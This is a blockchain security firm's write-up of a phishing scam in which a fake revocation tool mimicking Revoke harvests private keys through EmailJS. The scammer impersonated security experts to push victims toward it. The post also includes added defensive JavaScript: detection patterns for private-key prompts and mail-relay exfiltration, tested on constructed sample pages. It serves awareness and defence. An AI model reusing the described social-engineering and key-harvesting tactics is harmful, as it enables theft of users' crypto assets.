Behind the Mask: SlowMist Reveals How a Fake Security Expert Tricked Crypto Users
Authors: Liz & Reborn
Editor: Liz
Background
Yesterday, a user contacted the SlowMist Security Team to ask how to revoke a signature and provided a screenshot showing a “risky approval” tied to their wallet address.
The user explained that there was one authorization in their wallet that simply couldn’t be revoked — clicking it multiple times had no effect — and the interface showed a warning. They also recalled authorizing a token swap operation years ago, which made the alert feel more credible. This didn’t seem like an unfounded alarm.
A Scam Disguised as Security
The SlowMist team checked the wallet using a blockchain explorer and Revoke, but found no record of the risky approval shown in the screenshot. Soon after, the user sent another screenshot — this time from a different tool. Upon comparison, we noticed that the wallet address in the two screenshots didn’t match. We then suggested the user share the tool’s URL and the relevant address. The user started to feel confused too — could both their addresses really have risky approvals?
We immediately analyzed the tool in question: Signature Checker (http://signature[.]land). Right on the homepage, we noticed it allowed users to input their private keys to “check for risks.” A wallet that wasn’t risky at all could become compromised if a private key was entered into such a site.
What’s more, the phishing site closely mimicked the visual design and logo of the legitimate Revoke platform. This could easily mislead users into thinking they’re on an official revocation site, lowering their guard and increasing the risk of falling for the scam. Below is the homepage of the real Revoke site:
Using the tool provided by the scammer, we tested both wallet addresses and, unsurprisingly, both were flagged as having risky approvals. But in the dark forest of Web3, skepticism is a survival instinct. We continued testing and found that pasting in any address would trigger the same warning — and the “approval time” was always very close to the time of the check. This created the illusion of urgency: it made users believe that revoking now might still save them.
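The same test can be scripted. The following is an added example, not code from the original article or from SlowMist: it scores recorded results from a "risk checker" for the two tells described above. The observation format, the `isControl` field and the 10-minute threshold are assumptions, and all sample data is constructed.

```javascript
// Added example. All observations are constructed sample data (epoch seconds).
const MAX_SKEW_SECONDS = 600; // assumption: "very close" means within 10 minutes

function assessChecker(observations) {
  const flagged = observations.filter((o) => o.flagged);
  // A control address was generated by the tester and never used on-chain,
  // so a genuine tool cannot report an approval for it.
  const controlFlagged = flagged.some((o) => o.isControl);
  // Approval times that follow the query time are produced on demand.
  const nearCheck = flagged.filter(
    (o) => Math.abs(o.checkedAt - o.approvalAt) <= MAX_SKEW_SECONDS
  );
  const reasons = [];
  if (observations.length >= 3 && flagged.length === observations.length) {
    reasons.push("every address flagged");
  }
  if (controlFlagged) reasons.push("unused control address flagged");
  if (flagged.length > 0 && nearCheck.length === flagged.length) {
    reasons.push("approval time tracks check time");
  }
  return { fabricated: reasons.length >= 2, reasons };
}

const addr = (b) => "0x" + b.repeat(20); // constructed placeholder addresses
const SUSPECT_TOOL = [
  { address: addr("11"), isControl: false, flagged: true, approvalAt: 1700000000, checkedAt: 1700000120 },
  { address: addr("22"), isControl: false, flagged: true, approvalAt: 1700003500, checkedAt: 1700003600 },
  { address: addr("33"), isControl: true, flagged: true, approvalAt: 1700007100, checkedAt: 1700007200 },
];
const HONEST_TOOL = [
  { address: addr("11"), isControl: false, flagged: true, approvalAt: 1600000000, checkedAt: 1700000120 },
  { address: addr("22"), isControl: false, flagged: false, approvalAt: null, checkedAt: 1700003600 },
  { address: addr("33"), isControl: true, flagged: false, approvalAt: null, checkedAt: 1700007200 },
];

console.log(assessChecker(SUSPECT_TOOL), assessChecker(HONEST_TOOL));
```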
We then tried entering a test private key, which resulted in a pop-up error: “invalid format.” However, our input was still transmitted.
Upon analyzing the front-end code of the phishing site, we discovered that it uses the EmailJS API to send the entered data — even calling Etherscan’s API to check if the wallet address is valid.
Here is the request to the EmailJS API, showing how any input — whether a wallet address or private key — is sent directly to the scammer’s inbox at abpulimali@gmail[.]com.
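For reviewers who triage reported links, the pattern above can be checked statically. This is an added example, not the phishing site's code and not SlowMist tooling: it scans saved page source for a prompt for wallet secrets combined with a client-side EmailJS call. The indicator list, weights and verdict names are assumptions, and both sample pages are constructed.

```javascript
// Added example: static triage of saved HTML/JS for the key-harvesting pattern.
// Indicator weights and verdict names are assumptions made for this sketch.
const INDICATORS = [
  { id: "asks-for-secret", weight: 3,
    re: /(private\s*key|seed\s*phrase|mnemonic|recovery\s*phrase)/i },
  { id: "emailjs-endpoint", weight: 2,
    re: /api\.emailjs\.com\/api\/v1\.0\/email\/send/i },
  { id: "emailjs-sdk-call", weight: 2, re: /\bemailjs\.(send|sendForm)\s*\(/ },
  { id: "etherscan-lookup", weight: 1, re: /api\.etherscan\.io\/api/i },
];

function triagePage(source) {
  const hits = INDICATORS.filter((i) => i.re.test(source));
  const ids = hits.map((h) => h.id);
  const score = hits.reduce((sum, h) => sum + h.weight, 0);
  const asksSecret = ids.includes("asks-for-secret");
  const mailsOut =
    ids.includes("emailjs-endpoint") || ids.includes("emailjs-sdk-call");
  // A secret prompt plus a client-side mail relay means typed input can leave
  // the browser. A secret mention alone may be a warning, so it gets review.
  const verdict = asksSecret && mailsOut ? "block" : asksSecret ? "review" : "pass";
  return { ids, score, verdict };
}

// Constructed sample resembling the behaviour described in the article.
const SAMPLE_PAGE = `
<input id="walletInput" placeholder="Enter wallet address or private key">
<script>
  async function check() {
    const v = document.getElementById("walletInput").value;
    await fetch("https://api.etherscan.io/api?module=account&action=balance&address=" + v);
    emailjs.send("service_PLACEHOLDER", "template_PLACEHOLDER", { message: v });
  }
</script>`;

// Constructed benign sample: mentions secrets only to warn against sharing them.
const BENIGN_PAGE = `<p>We will never ask for your seed phrase.</p>`;

console.log(triagePage(SAMPLE_PAGE), triagePage(BENIGN_PAGE));
```

A "block" verdict here is a triage signal for a human reviewer; a site can relay input through other services, so a "pass" does not clear a page.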
At this point, the scam was quite clear. According to the user, the scammer first contacted them via replies and DMs on X (formerly Twitter), claiming: “You signed a phishing signature,” then provided a link to the “revocation tool.”
From the chat logs, it’s evident the scammer was well-versed in social engineering: they deliberately listed the unknown tool first and the legitimate Revoke site second. Most users are more likely to click the first link. When the fake tool shows a risk alert, and Revoke doesn’t, they might begin to doubt the real tool instead.
The scammer even offered a step-by-step tutorial, instructing the user to paste their private key into the phishing site under the guise of “revoking interactions with malicious contracts.” Voice support was also offered — clearly a high-pressure sales pitch to get the user to take the bait.
Though the user began to feel uneasy and stopped cooperating, the scammer didn’t give up. To build credibility, they even suggested the user verify the risk with the SlowMist Security Team. For less security-savvy users, the fact that the scammer was “willing” to consult a well-known security company could create a false sense of trust. The scammer even mentioned @SlowMist_Team directly during the conversation, attempting to falsely associate themselves with SlowMist.
Fortunately, this user remained vigilant. Instead of entering their private key, they reached out to the SlowMist team to confirm the situation, ultimately avoiding asset loss.
Impersonating Multiple Security Experts
Further investigation revealed that the scammer had also impersonated ZachXBT, a well-known on-chain sleuth, by using his avatar on Telegram.
After the user refused to cooperate, the scammer switched tactics and pretended to be a SlowMist employee in an attempt to continue the scam.
We examined the scammer’s X account (@Titanspace3), which has 74,000 followers. Though registered in 2021, it only became active in 2024. The account primarily reposts updates from security researchers, companies, and media outlets, claiming to focus on blockchain security. It’s evident this is a purchased “aged” account — a common practice in the grey market. (For related content, see our earlier article.)
Based on the language style of early posts and other user-supplied clues, we suspect the scammer may be from Indonesia.
Currently, the account remains active on X, repeatedly leaving comments under the guise of “friendly reminders,” luring Web3 users to phishing links and tricking them into disclosing their private keys. Web3 anti-scam platform Scam Sniffer has already flagged the site as malicious.
Final Thoughts
From fabricating “risky approval” warnings to impersonating security company staff, these scams are becoming increasingly sophisticated — sometimes even wearing a semi-official disguise. What drives it all is a classic “fortune favors the bold” mindset: scammers believe that if their act looks professional enough, most users won’t verify the details and will instead be driven by urgency to comply.
That’s why we strongly urge all users to be wary of those “waving the flag of security while doing harm.” In the dark forest of blockchain, the only way to protect your assets is by maintaining zero trust and practicing continuous verification. No matter who the other party claims to be, or how urgent the situation may sound — stay calm, verify through official channels, and never share your private key or seed phrase with anyone.
The SlowMist Security Team will continue to expose such scams, helping users stay informed, increase awareness, and jointly safeguard the bottom line of Web3 security.
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring), SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.